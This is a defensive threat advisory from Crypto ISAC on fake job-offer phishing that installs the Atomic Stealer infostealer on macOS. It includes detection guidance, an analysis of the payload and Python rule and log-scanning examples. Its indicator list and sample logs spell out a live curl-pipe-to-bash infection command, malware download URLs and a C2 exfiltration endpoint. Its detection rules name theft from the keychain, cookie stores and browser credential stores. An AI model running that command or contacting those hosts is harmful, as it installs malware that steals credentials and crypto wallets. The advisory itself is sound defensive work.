Phishing Alert: Sharp Uptick in Campaigns Targeting the Crypto Ecosystem

written by: Henry Beaudin

Executive Overview


The Crypto ISAC community is currently observing a substantial uptick in threat actors impersonating recruitment teams and senior leadership of crypto companies. These actors attempt to lure employees with fake job offers, typically sent through fraudulent meeting invitations or malicious calendar attachments. Once executed, the payloads compromise user systems, installing malware designed to harvest credentials, exfiltrate data, and establish persistent backdoor access.


If you have any questions or would like additional information, please contact us at 311@cryptoisac.org

Recommended Course of Action


  • Pay attention to impersonated domains that mimic common video conferencing services (e.g., Google Meet, Zoom).

  • Perform a retroactive search (90+ days) for the IOCs listed at the end of this report.

  • Implement detections to monitor for the following activity:

    • Unauthorized read operations targeting the macOS login keychain database (login.keychain-db) 

    • Direct file system access to Safari cookie stores (~/Library/Cookies/Cookies.binarycookies) 

    • Attempts to access browser-based credential storage mechanisms 

    • Creation of executable files within the temporary directories (/tmp/) 

    • Shell command execution patterns involving curl-pipe-to-bash operations directed at external suspicious/malicious domains 

    • Outbound connections to domains employing typosquatting techniques that mimic legitimate services (e.g., meet[.]google[.]com vs meet[.]google-talk[.]com) 
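As an added illustration of the detection bullets above (example code written for this page, not Crypto ISAC tooling), the following Python evaluates a handful of rules over endpoint telemetry. The event schema (`type`, `action`, `path`, `process`, `cmdline`, `domain`, `executable`), the allow-lists of processes expected to touch the keychain and cookie stores, and the brand-to-domain table are all assumptions to be replaced with your EDR's field names and your own baselines; the sample events are constructed to mirror the scenario in this advisory.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]

# Brand tokens and the real registrable domains they belong to. Hypothetical
# allow-list for this example; extend it with the services your org uses.
BRAND_DOMAINS = {
    "google": ("google.com", "googleusercontent.com"),
    "zoom": ("zoom.us",),
}

# Processes expected to read these stores. Assumed baselines; tune per fleet.
KEYCHAIN_READERS = {"securityd", "Keychain Access"}
SAFARI_COOKIE_READERS = {"Safari", "com.apple.WebKit.Networking"}
BROWSER_PROCESSES = {"Google Chrome", "firefox", "Safari"}
# Common browser credential stores (Chromium "Login Data", Firefox logins.json/key4.db).
BROWSER_CRED_FILES = {"Login Data", "logins.json", "key4.db"}

# "curl ... | bash" (also sh/zsh, optionally via sudo) on one command line.
CURL_PIPE_TO_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
URL_HOST = re.compile(r"https?://([^/\s:]+)")


def under_domain(host: str, domain: str) -> bool:
    """True when host is the legitimate domain itself or a subdomain of it."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def is_typosquat(host: str) -> bool:
    """Host carries a brand token but is not under that brand's real domain."""
    host = host.lower()
    return any(
        brand in host and not any(under_domain(host, d) for d in domains)
        for brand, domains in BRAND_DOMAINS.items()
    )


def check_process(ev: Event) -> List[str]:
    hits = []
    cmd = str(ev.get("cmdline", ""))
    if CURL_PIPE_TO_SHELL.search(cmd):
        hits.append("curl_pipe_to_shell")
        m = URL_HOST.search(cmd)
        if m and is_typosquat(m.group(1)):
            hits.append("typosquat_domain")
    return hits


def check_file(ev: Event) -> List[str]:
    hits = []
    path, proc = str(ev.get("path", "")), str(ev.get("process", ""))
    action = ev.get("action")
    name = path.rsplit("/", 1)[-1]
    if action == "read":
        if name == "login.keychain-db" and proc not in KEYCHAIN_READERS:
            hits.append("keychain_read")
        if name == "Cookies.binarycookies" and proc not in SAFARI_COOKIE_READERS:
            hits.append("safari_cookie_read")
        if name in BROWSER_CRED_FILES and proc not in BROWSER_PROCESSES:
            hits.append("browser_credential_store_read")
    # Executable dropped into /tmp, whether created executable or chmod'ed later.
    if action in ("create", "chmod") and path.startswith("/tmp/") and ev.get("executable"):
        hits.append("tmp_executable")
    return hits


def check_network(ev: Event) -> List[str]:
    return ["typosquat_domain"] if is_typosquat(str(ev.get("domain", ""))) else []


CHECKS = {"process": check_process, "file": check_file, "network": check_network}


def evaluate(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule each event trips."""
    findings = []
    for i, ev in enumerate(events):
        for rule in CHECKS.get(str(ev.get("type")), lambda _e: [])(ev):
            findings.append((i, rule))
    return findings


# Constructed telemetry modelled on the scenario in this advisory (not real logs).
SAMPLE_EVENTS: List[Event] = [
    {"type": "process", "process": "bash",
     "cmdline": "curl -s https://help-googleworkspace.com/devices/macos/voice.sh | bash"},
    {"type": "file", "action": "chmod", "path": "/tmp/update", "executable": True, "process": "chmod"},
    {"type": "file", "action": "read", "path": "/Users/alice/Library/Keychains/login.keychain-db", "process": "update"},
    {"type": "file", "action": "read", "path": "/Users/alice/Library/Cookies/Cookies.binarycookies", "process": "update"},
    {"type": "network", "domain": "meet.google-talk.com", "process": "Safari"},
    # Benign activity that must not alert:
    {"type": "network", "domain": "meet.google.com", "process": "Safari"},
    {"type": "file", "action": "read", "path": "/Users/alice/Library/Keychains/login.keychain-db", "process": "securityd"},
    {"type": "process", "process": "bash", "cmdline": "curl -s https://example.com/notes.txt -o /tmp/notes.txt"},
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The typosquat rule deliberately keys on brand tokens rather than edit distance, because the lures seen here (meet[.]google-talk[.]com, help-googleworkspace[.]com) embed the brand name verbatim; pair it with an allow-list of the conferencing domains your organisation actually uses so that legitimate subdomains never alert.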

Example Scenario


Initial Access

The victim receives a phishing email sent to their personal Gmail account, impersonating a Human Resources or Leadership contact from a cryptocurrency company. The message includes a malicious calendar invite, a social engineering tactic intended to bypass standard enterprise filtering and lure the victim into engaging with the content.

Execution

After downloading the invite and joining the fake Google Meet from their work laptop, the victim encounters a fraudulent pop-up claiming an audio issue. The pop-up directs them to run a command shared in the meeting chat. The command is a curl-pipe-to-bash one-liner, a well-known and risky method for executing arbitrary code.

Payload Delivery

Once executed, the curl-pipe-to-bash command retrieves a second-stage payload from the attacker-controlled server. This payload is identified as Atomic Stealer (AMOS), a commodity infostealer.

Impact

The Atomic Stealer compromises the endpoint by:

  • Capturing sensitive user data (credentials, browser data, crypto wallet information, etc.)

  • Preparing the data for exfiltration to a C2 server under the attacker’s control

  • Establishing persistence mechanisms to maintain access if the system is rebooted

Summary

This attack leverages a multi-stage phishing and social engineering chain:

  1. Fake HR (or Leadership) email + malicious calendar invite

  2. Social engineering in a fake meeting environment

  3. Curl-pipe-to-bash execution leading to Atomic Stealer installation

  4. Data theft and exfiltration to attacker infrastructure

Payload Analysis


First-Stage Payload

The initial payload is designed to deliver and execute the secondary malware. It:

  • Downloads a second-stage binary (“update”) into the /tmp/ directory using curl

  • Changes file permissions with chmod +x to make the binary executable

  • Immediately launches the prepared malware

Second-Stage Payload

The second-stage malware is more advanced and incorporates multiple capabilities:

  • Anti-analysis evasion: Detects sandbox or virtual machine environments and terminates execution if such conditions are found

  • Credential harvesting and privilege escalation: Extracts credentials to escalate privileges within the compromised system

  • Data exfiltration: Collects sensitive information across multiple sources, including:

    • Browser data

    • Cryptocurrency and desktop wallets

    • System data

    • Specific file types (JSON, wallet, TXT, PDF, and others)

  • Data staging and exfiltration: Prepares and transfers harvested information to an attacker-controlled C2 server

  • Persistence and monitoring: Installs a backdoor and wrapper for continuous monitoring and execution persistence

  • Trojanized applications: Identifies and modifies Ledger wallet applications (Ledger Live) with malicious code, if present

  • Cleanup operations: Removes artifacts to reduce detection and hinder forensic analysis

Indicators of Compromise (IOCs)


Each entry is listed as Type: Value (Context).

  • URL: https[://]meet[.]google-talk[.]com/abc-def-ghi (Fake Google Meet phishing site)

  • URL: https[://]help-googleworkspace[.]com/devices/macos/voice.sh (Malicious script hosting)

  • URL: https[://]halesmp[.]com/zxc/app (Backdoor binary download)

  • URL: https[://]halesmp[.]com/zxc/app.zip (Trojanized Ledger Live app)

  • URL: http://45[.]94[.]47[.]144/contact (C2 exfiltration endpoint)

  • IP Address: 45[.]94[.]47[.]144 (Primary C2 server)

  • Domain: meet[.]google-talk[.]com (Phishing domain)

  • Domain: help-googleworkspace[.]com (Malicious script hosting domain)

  • Domain: halesmp[.]com (Payload distribution domain)

  • File Path: /tmp/update (Second-stage payload location)

  • File Path: /tmp/out.zip (Compressed stolen data)

  • File Path: /tmp/.pass (Observed as part of the script)

  • File Path: ~/.agent (Persistent script)

  • File Path: ~/.username (Observed as part of the script)

  • File Path: ~/.pass (Observed as part of the script)

  • File Path: ~/.private (Observed as part of the script)

  • File Path: /Library/LaunchDaemons/com.finder.helper.plist (Persistence LaunchDaemon)

  • Base64 Identifier: 3zeges3r1ezSNvTzatsJWSRkuxyyybH1Lq6yQLuFrT4= (Campaign login identifier)

  • Base64 Identifier: ZEHCc3WT/cb5mS6EtLuFtLEqWtZBIzAP2HVYnyP/jvs= (Campaign Build ID identifier)

  • Command Line: curl -s https[://]help-googleworkspace[.]com/devices/macos/voice.sh | bash (Initial infection command)

  • SHA1: 35a1e0aec536155732ff70ef6af313af6011ea95 (Second-stage payload (/tmp/update) hash)
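The retroactive search recommended earlier needs the indicators above in their real (refanged) form and some care about partial matches. The following Python is an added example for this page, not a Crypto ISAC tool: it refangs the table as published, builds boundary-aware patterns (a subdomain of a listed domain matches, but /tmp/update.bak does not match /tmp/update), expands `~/` paths to the macOS `/Users/<name>/` form, and scans constructed log lines. The log format and the expansion rule are assumptions; the indicator values are those listed in the table.

```python
import re
from typing import List, Pattern, Tuple

# IOC table from the advisory above, kept defanged exactly as published.
# The command-line indicator is omitted: its URL entry already covers it.
IOC_TABLE: List[Tuple[str, str]] = [
    ("URL", "https[://]meet[.]google-talk[.]com/abc-def-ghi"),
    ("URL", "https[://]help-googleworkspace[.]com/devices/macos/voice.sh"),
    ("URL", "https[://]halesmp[.]com/zxc/app"),
    ("URL", "https[://]halesmp[.]com/zxc/app.zip"),
    ("URL", "http://45[.]94[.]47[.]144/contact"),
    ("IP Address", "45[.]94[.]47[.]144"),
    ("Domain", "meet[.]google-talk[.]com"),
    ("Domain", "help-googleworkspace[.]com"),
    ("Domain", "halesmp[.]com"),
    ("File Path", "/tmp/update"),
    ("File Path", "/tmp/out.zip"),
    ("File Path", "/tmp/.pass"),
    ("File Path", "~/.agent"),
    ("File Path", "~/.username"),
    ("File Path", "~/.pass"),
    ("File Path", "~/.private"),
    ("File Path", "/Library/LaunchDaemons/com.finder.helper.plist"),
    ("Base64 Identifier", "3zeges3r1ezSNvTzatsJWSRkuxyyybH1Lq6yQLuFrT4="),
    ("Base64 Identifier", "ZEHCc3WT/cb5mS6EtLuFtLEqWtZBIzAP2HVYnyP/jvs="),
    ("SHA1", "35a1e0aec536155732ff70ef6af313af6011ea95"),
]


def refang(value: str) -> str:
    """Undo the defanging used in the table so the value matches real log text."""
    return value.replace("[://]", "://").replace("[.]", ".").replace("hxxp", "http")


def compile_iocs(table: List[Tuple[str, str]]) -> List[Tuple[str, str, Pattern[str]]]:
    compiled = []
    for kind, raw in table:
        value = refang(raw)
        if value.startswith("~/"):
            # Assumed expansion: "~" may appear literally or as /Users/<name> on macOS.
            body = r"(?:~|/Users/[^/\s]+)/" + re.escape(value[2:])
        else:
            body = re.escape(value)
        # No letter/digit/hyphen immediately before (so x.halesmp.com still matches)
        # and no word char, dot or hyphen after (so /tmp/update.bak does not).
        pat = re.compile(r"(?<![\w-])" + body + r"(?![\w.-])", re.IGNORECASE)
        compiled.append((kind, value, pat))
    return compiled


IOC_PATTERNS = compile_iocs(IOC_TABLE)


def scan_logs(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line index, IOC type, refanged IOC value) for each indicator seen."""
    hits = []
    for i, line in enumerate(lines):
        for kind, value, pat in IOC_PATTERNS:
            if pat.search(line):
                hits.append((i, kind, value))
    return hits


# Constructed proxy/EDR lines for illustration; timestamps and hosts are made up.
SAMPLE_LOGS = [
    "2025-06-02T14:03:11Z proxy user=alice dst=meet.google-talk.com:443 action=allow",
    "2025-06-02T14:05:40Z proxy user=alice dst=help-googleworkspace.com:443 "
    "url=https://help-googleworkspace.com/devices/macos/voice.sh",
    "2025-06-02T14:05:44Z edr host=mbp-alice exec path=/tmp/update sha1=35a1e0aec536155732ff70ef6af313af6011ea95",
    "2025-06-02T14:06:02Z edr host=mbp-alice conn dst=45.94.47.144:80 uri=/contact",
    "2025-06-02T14:06:30Z edr host=mbp-alice exec path=/Users/alice/.agent parent=launchd",
    "2025-06-02T14:20:00Z proxy user=bob dst=meet.google.com:443 action=allow",
]

if __name__ == "__main__":
    for idx, kind, value in scan_logs(SAMPLE_LOGS):
        print(f"line {idx}: {kind} {value}")
```

Run it against exported proxy, DNS and EDR logs line by line; a hit on the domain or IP alone is worth triaging even when the full URL never appears, since most proxies log only the host for TLS connections.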

About Crypto ISAC

The Crypto ISAC is a member-driven, not-for-profit organization that works together to curb malicious actors, address vulnerabilities, share intelligence, and move security forward to protect the crypto ecosystem. We are founded by leading crypto organizations and designed for cryptosecurity experts to address the security and trust challenges that face crypto today and shape the crypto ecosystem of tomorrow.
